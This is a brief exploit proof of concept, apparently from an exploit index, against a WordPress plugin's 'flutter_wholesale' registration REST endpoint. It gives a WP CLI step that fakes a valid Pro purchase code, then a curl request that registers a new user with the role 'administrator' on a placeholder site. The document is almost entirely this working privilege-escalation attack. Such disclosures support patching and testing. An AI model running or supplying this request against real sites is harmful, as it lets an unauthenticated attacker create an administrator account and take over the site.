## https://sploitus.com/exploit?id=WPEX-ID:AC662436-29D7-4EA6-84E1-F9E229B44F5B
1) Simulate the site has a valid Pro API key by running the following in WP CLI:
wp> update_option('mstore_purchase_code', true)
2) Send the following request:
curl --url 'http://vulnerable-site.tld/wp-json/api/flutter_wholesale/register' -H 'Content-Type: application/json' --data '{"username":"new_user","email":"new_user_email@email.com","role":"administrator","password":"user_password"}'